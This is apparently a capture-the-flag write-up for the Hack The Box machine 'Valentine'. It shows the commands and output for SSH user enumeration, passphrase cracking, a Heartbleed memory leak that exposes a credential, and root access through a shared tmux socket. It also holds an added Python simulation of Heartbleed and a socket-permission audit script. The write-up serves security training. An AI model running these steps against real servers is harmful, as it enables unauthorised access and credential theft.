🕵 HTB-Writeup : VALENTINE

SYNOPSIS

Valentine is a unique medium-difficulty machine which focuses on the Heartbleed vulnerability, which had a devastating impact on systems across the globe.

Recon

nmap

└─$ nmap 10.10.10.79 -T5 -p- -sV -A -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-15 12:53 CEST
Warning: 10.10.10.79 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.79
Host is up (0.040s latency).
Not shown: 65197 closed tcp ports (conn-refused), 335 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_ssl-date: 2022-09-15T10:56:26+00:00; 0s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We are facing a Linux machine with an HTTP server, an HTTPS server (Apache 2.2.22) and an SSH server (OpenSSH 5.9p1).

dirbuster

Running a dirbuster scan, we found some files.

[Image: Result of the dirbuster scan]

We found a base64 encoded, passphrase-protected RSA private key at http://10.10.10.79/dev/hype_key.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
[...]
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

Maybe this private key is the one authorised on the SSH server. If so, we can use it to connect to the SSH server.

Finding vulnerabilities

Running searchsploit against the SSH version, we find that it is vulnerable to username enumeration.

└─$ searchsploit ssh 5.9
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                       | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                 | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                   | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                         | linux/remote/45001.py
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading       | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                           | linux/remote/45939.py
--------------------------------------------------------------- ---------------------------------

Get the username

First, I need to find the user who owns the key. The file is named hype_key, so I tried the exploit with the username hype.

└─$ python2 45939.py 10.10.10.79 hype
[+] hype is a valid username

We got our user: hype!

Trying to connect to SSH

We have a key and a user, so let's try to connect to the SSH server!

└─$ ssh -i tmp/hype hype@10.10.10.79
Enter passphrase for key 'tmp/hype': 

But we are asked for the key's passphrase, which we don't have.

I tried to brute-force the passphrase with john.

└─$ ssh2john hype > hash

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
0g 0:00:00:04 DONE (2022-09-15 16:16) 0g/s 3266Kp/s 3266Kc/s 3266KC/s a6_123..*7¡Vamos!
Session completed.

I was unable to recover the passphrase.

SSL Vulnerability

Running the nmap vuln scripts, we find that the OpenSSL version used by the server is vulnerable to Heartbleed.

└─$ nmap 10.10.10.79 --script "vuln" -p 22,80,443
[...]
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability ...
|     State: VULNERABLE
|     Risk factor: High
[...]

The Heartbleed vulnerability (CVE-2014-0160) lets an attacker leak the contents of server memory via crafted TLS heartbeat requests whose claimed payload length is larger than the payload actually sent, which triggers a buffer over-read.
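To make the over-read concrete, here is an added Python model (not code from the original post) of the heartbeat handler as it behaved before the OpenSSL fix and with the record-length check the fix added; the neighbouring form body and the claimed length of 64 are constructed for the demo.

```python
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING = 16  # RFC 6520 requires at least 16 bytes of padding

def build_heartbeat(payload: bytes, claimed_length: int) -> bytes:
    """Build a heartbeat request; claimed_length may exceed the real payload."""
    return struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length) + payload + b"\x00" * PADDING

def naive_heartbeat_response(memory: bytes) -> bytes:
    """Unpatched logic: trust the peer's length field and copy that many bytes
    starting at the payload, even past the end of the received record.
    `memory` stands for the process buffer: the record plus whatever follows it."""
    _hb_type, payload_len = struct.unpack("!BH", memory[:3])
    payload = memory[3:3 + payload_len]  # Python clamps the slice; C memcpy would not
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + payload + b"\x00" * PADDING

def checked_heartbeat_response(record: bytes) -> bytes:
    """Patched logic: type + length + payload + padding must fit inside the record
    that was actually received; otherwise the message is dropped."""
    if len(record) < 1 + 2 + PADDING:
        raise ValueError("heartbeat record too short")
    _hb_type, payload_len = struct.unpack("!BH", record[:3])
    if 1 + 2 + payload_len + PADDING > len(record):
        raise ValueError("claimed payload length exceeds record length")
    payload = record[3:3 + payload_len]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + payload + b"\x00" * PADDING

# Constructed neighbour data: a form body like the one leaked on this box,
# sitting in memory right after the received record.
NEIGHBOUR = b"$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg=="

def leaked_bytes(claimed_length: int = 64) -> bytes:
    """Bytes the naive handler echoes back beyond the 2-byte payload it was sent."""
    record = build_heartbeat(b"hi", claimed_length)
    response = naive_heartbeat_response(record + NEIGHBOUR)
    return response[3 + 2:3 + claimed_length]  # drop the header and the real payload

def is_rejected(claimed_length: int) -> bool:
    """True if the checked handler refuses a record with this claimed length."""
    try:
        checked_heartbeat_response(build_heartbeat(b"hi", claimed_length))
    except ValueError:
        return True
    return False
```

With the default claimed length of 64, `leaked_bytes()` contains the neighbouring form body, while `is_rejected(64)` shows the patched handler dropping the same record.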

I tried to exploit Heartbleed using scripts found on GitHub. Thanks to one of them, I found a string in the leaked memory.

Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==R..c]......-m.h....V

It is a base64-encoded string which decodes to heartbleedbelievethehype. I tried to connect to the SSH server with hype:heartbleedbelievethehype as a password, but it didn't work.

First shell as hype

Then I retried connecting with the private key we found earlier, using heartbleedbelievethehype as the passphrase.

└─$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i tmp/hype hype@10.10.10.79

hype@Valentine:~$ cat user.txt 
*************************a4b2f4c

We got our first shell! We can read the user flag :)

Path to the privesc

Searching the home directory, we find some commands in the .bash_history file.

hype@Valentine:~$ cat .bash_history 

tmux -L dev_sess 
tmux a -t dev_sess 
tmux --help
tmux -S /.devs/dev_sess 
[...]
tmux -S /.devs/dev_sess 

There are some tmux commands. Running the last one drops us into a root shell: the tmux server behind the /.devs/dev_sess socket runs as root, and the socket is accessible to hype.

hype@Valentine:~$ tmux -S /.devs/dev_sess

root@Valentine:/home/hype# id  
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/home/hype# cat /root/root.txt
**************************9db6a0

We can get the root flag :)
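As an added defensive check (not part of the original writeup): the root shell above comes from a root-owned tmux server whose socket is reachable by an unprivileged user. This Python audit walks a directory tree and flags Unix sockets that group or other can write to, which is the condition that lets another local user attach; the temporary directory and the two sockets it creates are a constructed fixture.

```python
import os
import socket
import stat
import tempfile

# Group/other write on a Unix socket is what lets another local user connect to it.
SHARED_WRITE = stat.S_IWGRP | stat.S_IWOTH

def find_writable_sockets(root: str) -> list:
    """Walk `root` and return (path, owner uid, mode) for every Unix socket that
    group or other may write to. A tmux server socket in that state lets any
    local user attach to the session and act as the server's owner."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the audit
            if stat.S_ISSOCK(st.st_mode) and st.st_mode & SHARED_WRITE:
                findings.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return findings

def make_constructed_socket_dir() -> tuple:
    """Constructed fixture: one socket left world-writable, one owner-only.
    Returns (root, exposed_path, private_path)."""
    root = tempfile.mkdtemp(prefix="sockaudit_")
    exposed = os.path.join(root, "dev_sess")
    private = os.path.join(root, "private_sess")
    for path, mode in ((exposed, 0o777), (private, 0o700)):
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(path)        # creates the socket file on disk
        s.close()           # the file stays behind for the audit to find
        os.chmod(path, mode)
    return root, exposed, private

if __name__ == "__main__":
    demo_root, _exposed, _private = make_constructed_socket_dir()
    for path, uid, mode in find_writable_sockets(demo_root):
        print(f"{path} owner={uid} mode={mode}")
```

Run against a real host with a root such as / (or the hidden directory seen in this writeup), any hit owned by uid 0 deserves the same attention as a world-writable setuid helper.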

Tags

External, SSL, Penetration Tester Level 2, CVE Exploitation, CVE-2014-0160, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Weak Permissions, CVE-2016-5195, Session Handling